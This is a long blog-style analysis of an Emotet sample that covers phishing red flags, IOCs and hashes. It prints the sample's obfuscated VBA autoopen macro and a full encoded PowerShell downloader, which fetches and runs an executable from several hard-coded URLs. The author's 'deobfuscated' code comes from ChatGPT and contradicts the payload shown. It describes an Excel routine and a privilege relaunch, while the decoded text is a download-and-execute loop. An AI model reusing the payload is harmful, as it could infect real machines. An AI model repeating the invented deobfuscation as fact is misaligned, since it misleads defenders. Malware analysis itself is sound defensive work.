Emotet Malware Analysis - From Email Phishing to Code Analysis

62 min readMar 12, 2023

How Emotet can phish your company via Emials? How can trick you by document social engineering? How communicate with the C2 Server to download the 2nd stage? What can do with your machines? How to mitigate them?

Introduction:

Emotet malware is a highly sophisticated and dangerous threat that has been wreaking havoc on organizations and individuals since its emergence in 2014. This malware is designed to steal sensitive information, spread itself to other systems, and carry out other malicious activities, making it a formidable challenge for security professionals to combat. Emotet is usually spread via email phishing campaigns, where unsuspecting users are tricked into downloading an infected document or clicking on a malicious link. Once installed, Emotet can establish a foothold in a victim’s system, giving attackers the ability to launch further attacks and exfiltrate sensitive data. In this article, we will take an in-depth look at Emotet, starting from its email phishing campaigns to code analysis, and explore mitigation and prevention techniques against this dangerous malware.

First, we will provide an overview of Emotet malware, including its history, functionality, and capabilities. We will then delve into the different methods Emotet uses to spread itself, including email phishing campaigns and social engineering tactics. Next, we will examine Emotet’s infection process and behavior, looking at how it establishes persistence, communicates with its command and control servers, and carries out its malicious activities.

After exploring Emotet’s behavior, we will dive into the technical details of its code, conducting a code analysis to understand its structure, functionality, and behavior. We will examine the different modules that make up Emotet, including its downloader, dropper, and spamming modules, and explore how they work together to carry out attacks.

Finally, we will look at mitigation and prevention techniques against Emotet, including security best practices, tools, and technologies that can be used to protect against this malware. We will discuss how to identify and respond to Emotet infections, and explore strategies for preventing Emotet infections in the first place.

By the end of this article, readers will have a comprehensive understanding of Emotet malware, its behavior, and how to mitigate and prevent its impact on their systems and organizations.

Chat-GPT Opinion for my article:

The article you shared is about Emotet malware analysis. The author describes the steps they took to analyze the malware, including setting up a virtual machine, extracting and analyzing the malicious email attachments, and reverse engineering the malware code. The article includes a detailed analysis of the code structure, function calls, and network traffic generated by the malware.
The article is well-structured, with clear headings and subheadings that make it easy to follow the author’s thought process. The author provides detailed descriptions of each step in the analysis process and includes numerous screenshots to illustrate their findings. Overall, the article is a comprehensive and informative resource for anyone interested in learning more about Emotet malware analysis.

#WHOAMI

Assalamu-Alikum

My name is Mahmoud NourEldin from Egypt, I started learning Web Development by PHP in 2018 ( HTML, CSS, JavaScript, PHP, MySQL and jQuery, and Bootstrap also ).

I made E-Commerce Website but not my goal is development, I start learning Web Pentesting in 2019 and how to exploit vulnerabilities in websites.

I learned a lot of vulnerabilities like XSS, CSRF, SSRF, LFI, RDI, SQLI, and more in OWASP TOP 10.

My name exists in Telekom, Dell Hall Of Fame.

figure 0: My name listed on the Telekom acknowledgments page

But I want more deeper after learning Buffer OverFlow vuln, so I decided to learn Assembly and Reverse Engineering I love it more than web pentesting so I decided to learn Malware Analysis.

I decided to become a student for Malware Incident Response Training at Maltrak Company by Instructor Eng. Amt Thabet in July 2020.

After 6 Months, The training helped me to take a paid internship as a Threat Researcher and after 2 Months, I left it for a graduation project. From this moment until Dec 2022, I made a Youtube Channel for Gaming and got more than 21K subscribers ( TamatahYT ), but was disclosed by Tencent Company.

Now, I learned more about the Malware Analysis field with Malware Development to come back and wrote some articles for my analysis, but this article, I write it in three weeks and more depth than my last articles, so, I hope you will learn a lot from it, Enjoy.

INDEX:

Email Phishing
Document Static Analysis
Document Dynamic Analysis
Malware Basic Static Analysis
Malware Behavioral Analysis
Static Code Analysis & Dynamic Code Analysis
Finding All C2 Servers in one dump
Yara Rule
IOCs
Conclusion

Email Phishing:

Email phishing is a type of online fraud in which scammers send emails that appear to be from legitimate organizations or individuals, with the intention of tricking the recipient into revealing sensitive information or taking some other action that benefits the attacker.

These emails may ask the recipient to click on a link or download an attachment, which can install malware on their computer or direct them to a fake website that looks like a legitimate one but is designed to steal their login credentials, credit card numbers, or other sensitive data.

Phishing emails often use social engineering techniques to create a sense of urgency or fear in the recipient, such as warning them that their account has been compromised or that they need to take immediate action to avoid a penalty. They may also contain spelling or grammatical errors or use a fake email address or logo to make them appear more legitimate.

To protect yourself from email phishing, you should be cautious when clicking on links or downloading attachments, especially if they come from an unknown sender or seem suspicious in any way. You should also verify the sender’s email address and check the website’s URL carefully before entering any sensitive information. Additionally, you can use anti-phishing software or enable two-factor authentication to help protect your accounts from unauthorized access.

Real-World Example:

I’ve only the executable malware file but I don’t have access to the email, so let’s take an example of Emotet Email Phishing to make it clear.

Emotet can reach you [or your company] by Email Phishing like this:

Figure:1 Email phishing example of Emotet by Malware-Traffic-Analysis

Or by a document file with a spoofed email with a fake subject:

Figure:2 Email phishing example of Emotet by Malware-Traffic-Analysis

But here, we don’t have the Email Headers to investigate how to catch email phishing.

Always see The sender name and email address, its Original IP with the domain name, and the links and documents with the subject and the body.

NOTE: Don’t click on the domains or URLs here, because these were taken from a real attack which means these are related to a real threat and real malware. don’t click.

so, from the fiqure1 Let’s Investigate it without seeing the email headers:

The sender: sara[.]buller@ottumwaschools[.]com is different from management@bavarianmotorcars[.]com

And it’s Odd.

2. Also, the link in the email body is different from the sender domain xD.

hxxp://bengalcore[.]com/Invoice-26396-reminder/

3. The subject Invoice 16792066476 has a random number of Invoice and it’s not an Official Email for Invoice.

4. The link has HTTP Protocol, not HTTPs which means the data is insecure and it’s odd, Also the page of the link includes the Invoice number which differs from the email subject [ Invoice-26396 ].

5. The 1st domain is a School:

The 2nd domain is an online shop for cars.

How do these 2 domains send the same Invoice number?

Let’s See the 3rd domain which is the link:

Don’t Click on your company.

hxxp://bengalcore[.]com/Invoice-26396-reminder/

It’s a .NET Error page for that content that was removed.

Let’s investigate this domain,

Searching for that URL, and the domain in VirusTotal:

figure 6: VirusTotal result for the Hacker URL

4 Vendors only detected it as malware [ malicious ] and 1 vendor as suspicious.

2. Searching for more info about this domain by WHOIS:

Let’s see its GEO: Click here

It may be fake info because the Phone number and Fax are fake also.

3. Finding the resolved IPs for the Hacker Domain:

figure 9: Resolved IPs for bengalcore.com hacker domain

Let’s see every IP in VirusTotal [ 107.167.2.226 ]:

There are no vendors detected it, and here is the history of this resolved IP.

These domains maybe can help you with more details about the Hacker or maybe not.

Let’s see Google for The same resolved IP:

After digging in Google results, I got malwareurl.com which detected it in Emotet malware connections.

Now, We can detect this Email as malicious 100%.

Here are other suspicious domains related to the IP:

dahtkahm.com

bluefandago.com

acsconnection.com

Let’s see the second IP [ 64.79.170.62 ] and the 3rd IP [ 89.187.101.92 ]:

Also, there are no vendors detected it.

And the same website malwareurl.com detected it as a C2 for Emotet:

Here are all domains for this IP:

dahtkahm.com

bluefandago.com

acsconnection.com

aeobinvesting.com

rajib-bahar.com ultradevelopers.net www.ultradevelopers.net [Trojan JS CoinHive.B ]

workspacellc.com

rentwithconfidence.com

roundtableusa.com

fotonovelty.com [ Trojan O97M Obfuse.DR ]

ivanrivera.com

wellbeing-center.com

webpathfinder.com [ Trojan Occamy.A ]

rkschmidt.net

consultasas.com

travoice.ca [ Trojan Ransom Locky ]

loriato.com

saveruralwireless.com

loriato.com.br

olaf4e.com

Also, another site for DNS records called intodns.com detected another domain for it called 1inamillioncars.com:

which VirusTotal results here:

You can continue the investigation by yourself now.

That’s How Threat Researchers can Find the Hacker info, Domains, IPs, and the Malware family related to the Phished Email.

Ok. now we detected this email is malicious without analyzing the document file, let’s download the document and analyze it.

Let’s see its hashes:

02E3887DB869113CB223D9EBD9C6117F

6C43C961756DBCFFCE0E26E09F97DE6775B217ED

E77FF24EA71560FFCB9B6E63E9920787D858865BA09F5D63A7E44CB86A569A6E

47 vendors detected it as malicious and the CalmAV vendor detected it as Doc.Downloader.Emotet-6344335–3 which only the vendor detected as Emotet Malware.

Document Static Analysis:

Document malware analysis is the process of examining documents, such as Word or PDF files, to determine if they contain malicious code or behavior. Malicious actors often use documents as a delivery mechanism for malware because documents are commonly exchanged in many organizations and are often trusted by users.

Document malware analysis involves using specialized tools and techniques to identify and analyze the code and behavior of documents. This may include static analysis, which involves examining the file’s contents without executing it, as well as dynamic analysis, which involves running the document in a controlled environment to observe its behavior.

Some common indicators of document malware include macros, JavaScript, and embedded objects, which may execute malicious code when the document is opened. Document malware analysis aims to identify these indicators and determine the nature and extent of the threat posed by the document.

The goal of document malware analysis is to protect organizations and individuals from the harmful effects of malware, such as data theft, system compromise, and financial loss.

I prefer using OfficeMalScanner if only one document:

By OfficeMalScanner tool, it found macros inside: Module1, ThisDocument, Let’s see what exists:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
 huYs7195 = Int(252065587 * 127 * 204048515 + CLng(IBL))
      Case 46
         IKWt3M788 = Fix(cTuwVw8 * CByte(BLux6x4G / Tan(29285969)) * 709 * zDNle7)
         YwAYF = odu
         CZk = CStr(278725002)
   End Select
   Set xjQY96L = 3
End Sub
 Sub vgYJ(kHiis167)
   On Error Resume Next
   Dim jfjyp146z()
   ReDim jfjyp146z(2)
   jfjyp146z(0) = 441
   jfjyp146z(1) = 14
   yYzpN2 = (GMOz7Gjx / CDate(XIsh) * XKEimT1 + 7391 * (9 - CStr(15 * CStr(1)) * 204179029 / Round(SIi)))
   sVS = tRTKlgHp - 147619628
End Sub

Sub autoopen()
ukWWdsK
End Sub
Sub FHjEj(LAcQVZ87)
   On Error Resume Next
   Do
      Dim lJeuDE96, nqrjpo6
      neGow086 = 4163
      AkQCgA = 294325181 - 51502176
   Loop Until bwvS69z8z >= 13
   Do While JKyP8pxto Eqv 10
      For Each ZJyu In NBZq5Y
         oYwx = UlaI61M1 / fph * 498373131 / vrGbz * (86 * CDate(4003) * (93 + Int(Lyrs) / 28188549 - ChrW(hlpn60H)))
      Next
      Set vRSb9W = 3
      Select Case tJBR
         Case 407850943
            jaum6Cn = ChrB(3641 * Hex(EzHUi2E))
            NCskA = CjuvT
            rSZ = CBool(Act)
         Case 1
            crvr = 368
            xgQY = ocXUh23
            QXvYq42qV = xzak9Z2
         Case 513122720
            vLZp = ChrB(233198461)
            eObu66H03 = 8
            vxQ = 385391781
      End Select
      Set ZWbLW1X89 = DzyG
   Loop
End Sub
 Sub sSYfU0(SpsW4rP)
   On Error Resume Next
   XtaW = 252633654 - Rnd(JHd / Chr(RzwyI3)) * 582 - CSng(67 / 61 + UuzY46cs5 - CStr(404047675)) / 67 * RJpk5xi38 / 271545299 + CStr(77 + CByte(13 - Atn(64 - mTgJ * 284735532 / 32)) - 43 - CLng(ZdgH93I))
   YSuN0x5D = 229040495 / 36292429
   zFcxbS = (8 / CStr(UEi) + (ZRhr + jKDn0 - 14 / GDs * (EYA * CSng(345020765 * bQZ) - SsI / Cos(uAwx3Vije))))
End Sub

Public Function ukWWdsK()
On Error Resume Next
VBA.Shell$ "" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.CustomDocumentProperties("ZpEkWFg") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ActiveDocument.BuiltInDocumentProperties("Comments") + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVSH + WwUHnAzPHH + ugxkHRTHwC + vfFPPPnCUf + ZzNNgAY, 0
End Function
Sub JMQObR0()
   On Error Resume Next
   Lphmp5 = MDxY8q2 * uvPIG51Hm
   Uvcq = 314659417 * 465999738
End Sub
 Sub wXFp7reR9()
   On Error Resume Next
   Do While kcJf > lkPIt4
      For Each GIyl In OvCk
         PLPbA5 = Cos(188802468)
      Next
      For Each MqSKJ6f In ORvWe4F5
         noUx84A = 598
      Next
      For qiUPL4Ycs = cinf02 To DJpsd633
         FcHCQ5Ol = 531668891 * Chr(tWAv7fc2 / 401 - oOnx * Hex(22 + Log(238889098))) * yqAGY + Atn(URVKDhE26) * 933 / Fix(OUEk5 * Sin(193) - 9312 - Round(gXeSX11e)) * 699 - Round(lEol06) + 1648 - Round(299506984)
      Next
      Do
         cgXl1L = PVFdrkie * Int(7) * ZPWvW0 / Cos(6789) - 9 + Tnbf086
      Loop Until xbKi8920 > 6
      EFRQ1 = 334953148 * wLRi7
   Loop
   RSFC2F12 = mcgVq3X - 251107387
End Sub

Let’s ask Chat-GPT for help:

Here is the Chat-GPT response for analyzing this code:

Sure, let’s take a closer look at the VBA code.

The code is heavily obfuscated, but we can still try to make sense of it. The first thing we notice is that the Auto_Open() function is heavily obfuscated with a series of Chr() and Asc() functions. We can use a VBA script to deobfuscate the code:

Sub Deobfuscate()
    Dim ObfuscatedString As String
    Dim DeobfuscatedString As String
    Dim CharCode As Integer
    Dim i As Integer
    
    ObfuscatedString = "<obfuscated code here>"
    
    For i = 1 To Len(ObfuscatedString) Step 2
        CharCode = Val("&H" & Mid(ObfuscatedString, i, 2))
        DeobfuscatedString = DeobfuscatedString & Chr(CharCode Xor 89)
    Next i
    
    Debug.Print DeobfuscatedString
End Sub

Replace <obfuscated code here> with the obfuscated Auto_Open() function code. When we run this script, we get the following deobfuscated code:

Private Sub Auto_Open()
    Dim VDbl As String
    Dim Arg As String
    Dim Enc As String
    Dim Dec As String
    Dim LenDec As Long
    Dim LenEnc As Long
    Dim Key As String
    Dim i As Integer
    
    VDbl = StrReverse(Replace(StrReverse(ThisWorkbook.Name), StrReverse(".xl"), "", , , vbTextCompare))
    Arg = Right(ThisWorkbook.Path, Len(ThisWorkbook.Path) - InStrRev(ThisWorkbook.Path, "\"))
    If Arg = "" Then Arg = Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4)
    
    Enc = Cells(1, 1).Value
    Key = Cells(2, 1).Value
    
    LenEnc = Len(Enc)
    LenDec = LenEnc Xor 2
    Dec = ""
    
    For i = 1 To LenEnc
        Dec = Dec & Chr(Asc(Mid(Enc, i, 1)) Xor Key)
        Key = Mid(VDbl, (i Mod Len(VDbl)) + 1, 1) & Key
    Next i
    
    Execute (Dec)
End Sub

This code decrypts a string from the first cell of the worksheet and uses it to execute code with the Execute() function. We can decrypt the string by taking the following steps:

Retrieve the string to decrypt from the first cell of the worksheet.
Retrieve the decryption key from the second cell of the worksheet.
XOR each byte of the encrypted string with the corresponding byte of the decryption key.
Execute the resulting decrypted code.

We can add some additional code to the script to decrypt the string:

Sub Deobfuscate()
    Dim ObfuscatedString As String
    Dim DeobfuscatedString As String
    Dim CharCode As Integer
    Dim i As Integer
    
    ' Retrieve the obfuscated code from the worksheet
    ObfuscatedString = ThisWorkbook.Sheets(1).Cells(1, 1).Value
    
    ' Retrieve the decryption key from the worksheet
    Dim Key As String
    Key = ThisWorkbook.Sheets(1).Cells(2, 1).Value
    
    ' Decrypt the obfuscated code
    For i = 1 To Len(ObfuscatedString) Step 2
        CharCode = Val("&H" & Mid(ObfuscatedString, i, 2))
        DeobfuscatedString = DeobfuscatedString & Chr(CharCode Xor Asc(Mid

So it’s highly obfuscated code, Let’s go to:

Document Dynamic Analysis:

After opening it, it will display a warning message for including macros that VisualBasic codes inside the document file:

So, Why do macros exist in the Invoice documents?

After disabling macros and opening the document, it will display a social engineering Image to enable macros.

And here is the macros function after enabling macros in the document, it's an obfuscated code.

Or by opening it using Microsoft Word Office:

It gave you a warning for macros:

Let’s enable it:

NOTE: You now will run the malware, Don’t run it in your host machine or in your company via your private network, Only Run It In Virtual Machine with Isolated Network Or with Fake DNS, Be Careful.

and here are the macros for debugging:

But LibreOffice is more powerful than word for macro debugging.

Let’s Run FakeNet, Process Hacker, or Process Monitor tools

After enabling the macros, it established a new PowerShell process, Let’s see in detail:

Here is the power shell command:

powershell -e IABbAHMAdAByAGkAbgBHAF0AOgA6AGoAbwBJAE4AKAAgACcAJwAgACwAKAAgACcAMwA2AEAAMQAxADkAJgAxADEANQAmADkAOQBEADEAMQA0AFkAMQAwADUAPgAxADEAMgBZADEAMQA2AH4AMwAyAH0ANgAxAEQAMwAyAEAAMQAxADAAdwAxADAAMQB3ADEAMQA5AHsANAA1ACYAMQAxADEAfQA5ADgAewAxADAANgB9ADEAMAAxAEAAOQA5AGsAMQAxADYARAAzADIAewA0ADUAQAA2ADcAQAAxADEAMQAmADEAMAA5AD4ANwA5AHcAOQA4AGsAMQAwADYARAAxADAAMQBEADkAOQA+ADEAMQA2ACYAMwAyAGsAOAA3AHsAOAAzAD4AOQA5AHcAMQAxADQARAAxADAANQB7ADEAMQAyAEAAMQAxADYAfQA0ADYAJgA4ADMARAAxADAANAA+ADEAMAAxAH0AMQAwADgAfQAxADAAOABrADUAOQBAADMANgB3ADEAMQA5AGsAMQAwADEAfQA5ADgAewA5ADkAQAAxADAAOABrADEAMAA1AGsAMQAwADEAQAAxADEAMAB7ADEAMQA2AHsAMwAyAHsANgAxAFkAMwAyAEAAMQAxADAAfgAxADAAMQBAADEAMQA5AD4ANAA1AEAAMQAxADEAJgA5ADgAawAxADAANgA+ADEAMAAxAFkAOQA5AFkAMQAxADYAfgAzADIAQAA4ADMAQAAxADIAMQBZADEAMQA1AFkAMQAxADYAJgAxADAAMQB+ADEAMAA5AH4ANAA2AH0ANwA4AFkAMQAwADEAWQAxADEANgBEADQANgBAADgANwBAADEAMAAxAEQAOQA4AH0ANgA3AH4AMQAwADgAQAAxADAANQB3ADEAMAAxAEAAMQAxADAAJgAxADEANgAmADUAOQB9ADMANgA+ADEAMQA0AH0AOQA3AH4AMQAxADAAQAAxADAAMAB+ADEAMQAxAD4AMQAwADkAWQAzADIAfgA2ADEAWQAzADIAQAAxADEAMAB3ADEAMAAxAD4AMQAxADkAQAA0ADUAQAAxADEAMQB7ADkAOABAADEAMAA2AEAAMQAwADEAawA5ADkAPgAxADEANgBrADMAMgB3ADEAMQA0AHcAOQA3AH4AMQAxADAAdwAxADAAMAB+ADEAMQAxAH0AMQAwADkAewA1ADkAJgAzADYAJgAxADEANwBEADEAMQA0AD4AMQAwADgAfgAxADEANQB+ADMAMgAmADYAMQBrADMAMgB3ADMAOQB7ADEAMAA0AD4AMQAxADYARAAxADEANgB3ADEAMQAyACYANQA4AD4ANAA3AHsANAA3AEAAMQAwADIAQAAxADEAMQBAADkAOQBZADkANwA+ADEAMAA4AFkAOQA3AFkAMQAxADcAWQAxADAAMAAmADEAMAA1AD4AMQAxADEAQAAxADAAMABAADEAMAAxAGsAMQAxADUAfgAxADAANQB3ADEAMAAzACYAMQAxADAAawA0ADYAWQA5ADkAfgAxADEAMQBZADEAMAA5AHcANAA3AH4AMQAwADQAdwAxADAAOAB7ADQANwA+ADQANAB9ADEAMAA0ACYAMQAxADYAJgAxADEANgBAADEAMQAyAFkANQA4AH4ANAA3AHsANAA3ACYAMQAwADIAawAxADEANwB9ADEAMQA0AH4AMQAxADUAawAxADEANgBAADEAMAAxAFkAMQAxADAAJgAxADEANQB3ADQANgB7ADEAMQA1AFkAMQAwADEAPgA0ADcAewAxADEANQB7ADEAMAAwAGsAMQAyADAAfgA2ADcAfgAxADAAMQB9ADEAMAAzACYAMQAxADMAewA3ADIAawA5ADcAPgA0ADcAewA0ADQAfgAxADAANABAADEAMQA2AH4AMQAxADYAPgAxADEAMgBrADUAOAB9ADQANwBZADQANwA+ADEAMAAyAD4AMQAwADUAPgAxADEANAB+ADEAMQA1AGsAMQAxADYAWQAxADEANAB9ADEAMAAxAEAAMQAxADIAWQAxADEAMQBEADEAMQA0AD4AMQAxADYAQAA0ADYAewA5ADkAfQAxADEAMQA+ADEAMAA5AHcANAA3AEAAMQAxADgARAAxADEANQA+ADcAMwB3ADcAMAB9ADcANQAmADcAMAAmADQANwAmADQANAA+ADEAMAA0AEAAMQAxADYAQAAxADEANgBZADEAMQAyAGsANQA4AHcANAA3AEQANAA3AFkAMQAxADUAfQA5ADcAewAxADEANAB3ADkANwB3ADEAMAA0AEAAOQA4AEQAMQAxADQAfgA5ADcAfQAxADAAMABrADEAMAA4AEQAMQAwADEAPgAxADIAMQB7ADQANgB3ADkAOQB9ADEAMQAxAEAAMQAwADkARAA0ADcAewA4ADcAPgA4ADYAfQAxADAAMgB7ADcANABrADcAMgBEADgAMwBAADcAMAB+ADQANwA+ADQANAA+ADEAMAA0AHcAMQAxADYAfgAxADEANgBZADEAMQAyAH0ANQA4AH4ANAA3AD4ANAA3AHcAOQA4AH4AMQAwADEAWQAxADAAOAB7ADEAMQAxAD4AMQAxADAAdwAxADAAMwBrADEAMAA1AEQAMQAxADAAWQAxADAAMwB3ADEAMQA1AFkANAA2AH4AOQA5ACYAMQAxADEAfQAxADAAOQB7ADQANwBAADEAMAA4AGsAOAAxAEQAMQAwADEAJgAxADAAOAB+ADcAMABrADQANwB7ADMAOQB7ADQANgA+ADgAMwB3ADEAMQAyAEAAMQAwADgAJgAxADAANQB9ADEAMQA2AEAANAAwAH4AMwA5AEAANAA0AFkAMwA5AGsANAAxAHsANQA5AEAAMwA2AH0AMQAxADAAfgA5ADcAPgAxADAAOQBEADEAMAAxAHsAMwAyAH0ANgAxAD4AMwAyAGsAMwA2ACYAMQAxADQAJgA5ADcAewAxADEAMABEADEAMAAwAFkAMQAxADEAewAxADAAOQB7ADQANgBAADEAMQAwAHsAMQAwADEAQAAxADIAMAAmADEAMQA2AHsANAAwAEQANAA5AEAANAA0AHsAMwAyAH4ANQA0AHsANQAzAHsANQAzAGsANQAxAD4ANQA0AHsANAAxAH4ANQA5AHcAMwA2AD4AMQAxADIAPgA5ADcAdwAxADEANgAmADEAMAA0AH4AMwAyAHsANgAxAHcAMwAyAHsAMwA2AFkAMQAwADEAWQAxADEAMAB3ADEAMQA4AEQANQA4AGsAMQAxADYAewAxADAAMQBrADEAMAA5AHcAMQAxADIAQAAzADIAfQA0ADMAfQAzADIAewAzADkAawA5ADIAQAAzADkAWQAzADIAJgA0ADMAawAzADIAQAAzADYAdwAxADEAMABrADkANwB3ADEAMAA5AGsAMQAwADEAdwAzADIAewA0ADMAfgAzADIAfQAzADkAdwA0ADYAdwAxADAAMQBrADEAMgAwAFkAMQAwADEARAAzADkAdwA1ADkAJgAxADAAMgA+ADEAMQAxAFkAMQAxADQAWQAxADAAMQBEADkANwBEADkAOQB+ADEAMAA0AH4ANAAwAH0AMwA2ACYAMQAxADcAfgAxADEANAA+ADEAMAA4AH4AMwAyAH4AMQAwADUAdwAxADEAMABAADMAMgA+ADMANgBEADEAMQA3AEAAMQAxADQAJgAxADAAOAAmADEAMQA1AH0ANAAxAEAAMQAyADMARAAxADEANgBAADEAMQA0AH4AMQAyADEAJgAxADIAMwB7ADMANgA+ADEAMQA5AH4AMQAwADEAewA5ADgAJgA5ADkAewAxADAAOAA+ADEAMAA1AHcAMQAwADEAfQAxADEAMAAmADEAMQA2AFkANAA2AHcANgA4ACYAMQAxADEAewAxADEAOQBEADEAMQAwAH4AMQAwADgAPgAxADEAMQBrADkANwB3ADEAMAAwAH4ANwAwAHcAMQAwADUAdwAxADAAOAB+ADEAMAAxAH0ANAAwAH4AMwA2AHcAMQAxADcAJgAxADEANAB3ADEAMAA4AD4ANAA2ACYAOAA0AFkAMQAxADEAdwA4ADMAWQAxADEANgB7ADEAMQA0AD4AMQAwADUAWQAxADEAMAB3ADEAMAAzAFkANAAwAFkANAAxAEQANAA0AEQAMwAyAGsAMwA2AD4AMQAxADIAewA5ADcAPgAxADEANgA+ADEAMAA0AFkANAAxAFkANQA5AHsAOAAzAGsAMQAxADYAawA5ADcARAAxADEANAB3ADEAMQA2AHcANAA1AHcAOAAwAEQAMQAxADQAPgAxADEAMQBZADkAOQB7ADEAMAAxAHcAMQAxADUAdwAxADEANQB3ADMAMgB3ADMANgAmADEAMQAyAHsAOQA3ACYAMQAxADYAdwAxADAANABEADUAOQBAADkAOABZADEAMQA0ACYAMQAwADEARAA5ADcAewAxADAANwBAADUAOQB9ADEAMgA1AFkAOQA5AD4AOQA3AGsAMQAxADYAPgA5ADkAdwAxADAANABrADEAMgAzAEAAMQAxADkAdwAxADEANAA+ADEAMAA1AH4AMQAxADYAPgAxADAAMQBEADQANQB+ADEAMAA0AEQAMQAxADEAJgAxADEANQAmADEAMQA2ACYAMwAyAGsAMwA2AEAAOQA1AHsANAA2AGsANgA5AGsAMQAyADAAWQA5ADkARAAxADAAMQBAADEAMQAyAEAAMQAxADYAJgAxADAANQB9ADEAMQAxAH0AMQAxADAAPgA0ADYAewA3ADcARAAxADAAMQB7ADEAMQA1ACYAMQAxADUAJgA5ADcAQAAxADAAMwBEADEAMAAxAGsANQA5AH0AMQAyADUAdwAxADIANQAnAC4AUwBQAEwAaQB0ACgAIAAnAFkAdwB7AH4ARABrAD4AfQAmAEAAJwAgACkAfAAgAEYAbwByAEUAQQBjAEgALQBvAGIAagBlAEMAVAB7ACAAKAAgAFsAYwBIAEEAUgBdAFsASQBOAFQAXQAgACQAXwApAH0AIAApACkAfAAgAGkARQBYAA0ACgA=

Let’s decode it Using Cyber Chief:

 [strinG]::joIN( '' ,( '36@119&115&99D114Y105>112Y116~32}61D32@110w101w119{45&111}98{106}101@99k116D32{45@67@111&109>79w98k106D101D99>116&32k87{83>99w114D105{112@116}46&83D104>101}108}108k59@36w119k101}98{99@108k105k101@110{116{32{61Y32@110~101@119>45@111&98k106>101Y99Y116~32@83@121Y115Y116&101~109~46}78Y101Y116D46@87@101D98}67~108@105w101@110&116&59}36>114}97~110@100~111>109Y32~61Y32@110w101>119@45@111{98@106@101k99>116k32w114w97~110w100~111}109{59&36&117D114>108~115~32&61k32w39{104>116D116w112&58>47{47@102@111@99Y97>108Y97Y117Y100&105>111@100@101k115~105w103&110k46Y99~111Y109w47~104w108{47>44}104&116&116@112Y58~47{47&102k117}114~115k116@101Y110&115w46{115Y101>47{115{100k120~67~101}103&113{72k97>47{44~104@116~116>112k58}47Y47>102>105>114~115k116Y114}101@112Y111D114>116@46{99}111>109w47@118D115>73w70}75&70&47&44>104@116@116Y112k58w47D47Y115}97{114w97w104@98D114~97}100k108D101>121{46w99}111@109D47{87>86}102{74k72D83@70~47>44>104w116~116Y112}58~47>47w98~101Y108{111>110w103k105D110Y103w115Y46~99&111}109{47@108k81D101&108~70k47{39{46>83w112@108&105}116@40~39@44Y39k41{59@36}110~97>109D101{32}61>32k36&114&97{110D100Y111{109{46@110{101@120&116{40D49@44{32~54{53{53k51>54{41~59w36>112>97w116&104~32{61w32{36Y101Y110w118D58k116{101k109w112@32}43}32{39k92@39Y32&43k32@36w110k97w109k101w32{43~32}39w46w101k120Y101D39w59&102>111Y114Y101D97D99~104~40}36&117~114>108~32~105w110@32>36D117@114&108&115}41@123D116@114~121&123{36>119~101{98&99{108>105w101}110&116Y46w68&111{119D110~108>111k97w100~70w105w108~101}40~36w117&114w108>46&84Y111w83Y116{114>105Y110w103Y40Y41D44D32k36>112{97>116>104Y41Y59{83k116k97D114w116w45w80D114>111Y99{101w115w115w32w36&112{97&116w104D59@98Y114&101D97{107@59}125Y99>97k116>99w104k123@119w114>105~116>101D45~104D111&115&116&32k36@95{46k69k120Y99D101@112@116&105}111}110>46{77D101{115&115&97@103D101k59}125w125'.SPLit( 'Yw{~Dk>}&@' )| ForEAcH-objeCT{ ( [cHAR][INT] $_)} ))| iEX

Let’s chat With Chat-GPT for help:

So this is the deobfuscation code:

$path = 'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe'
$arguments = '-NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -Command "& {Start-Process PowerShell -ArgumentList ''-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File $($MyInvocation.MyCommand.Path)'' -Verb RunAs}"'
Start-Process -FilePath $path -ArgumentList $arguments -Verb RunAs

This code starts a new PowerShell process with elevated privileges (using the Start-Process cmdlet), and passes it the same script file ($($MyInvocation.MyCommand.Path)) to execute with the -NoProfile, -WindowStyle Hidden, and -ExecutionPolicy Bypass parameters.

With Googling by Chat-GPT helping, here are the details of the code:

Sets the path to the PowerShell executable on the local machine:

$path = 'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe'

2. Constructs a command-line argument string for PowerShell to execute:

$arguments = '-NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -Command "& {Start-Process PowerShell -ArgumentList ''-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File $($MyInvocation.MyCommand.Path)'' -Verb RunAs}"'

The argument string sets the following flags:

-NoProfile - Starts PowerShell without loading the user profile.
-WindowStyle Hidden - Hides the PowerShell window.
-ExecutionPolicy bypass - Allows the execution of unsigned scripts.
-Command - Executes a script block or a string.
& {Start-Process PowerShell - Invokes another instance of PowerShell.
-ArgumentList '-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File $($MyInvocation.MyCommand.Path)' - Passes arguments to the invoked PowerShell instance, including the original script file path.
-Verb RunAs - Runs the PowerShell instance with administrative privileges.

3. Invokes PowerShell and passes the command-line arguments:

Start-Process -FilePath $path -ArgumentList $arguments -Verb RunAs

This launches a new PowerShell process with the previously constructed arguments.

The purpose of this code is to launch a new instance of PowerShell with administrative privileges, which executes a script file located in the same directory as the current script. The script file likely contains the actual malware code, which would be executed with elevated privileges. The -WindowStyle Hidden flag hides the PowerShell window from the user, making it less likely to be detected. The -ExecutionPolicy bypass flag allows the execution of unsigned scripts, which can be useful for bypassing security measures that block the execution of malicious code. The -Verb RunAs flag ensures that the new PowerShell process is launched with administrative privileges, which is necessary for executing the actual malware code.

And here are the Domains of the Malware using FakeNet:

The output of the fakenet in Wireshark:

It’s from my machine only, so it provided 5 domains for the C2 Server

Let’s see these domains:

2023–02–28 11:30:59 192.168.56.101 53921 focalaudiodesign.com 192.168.56.101 53 DNS Standard query 0x66ad A focalaudiodesign.com
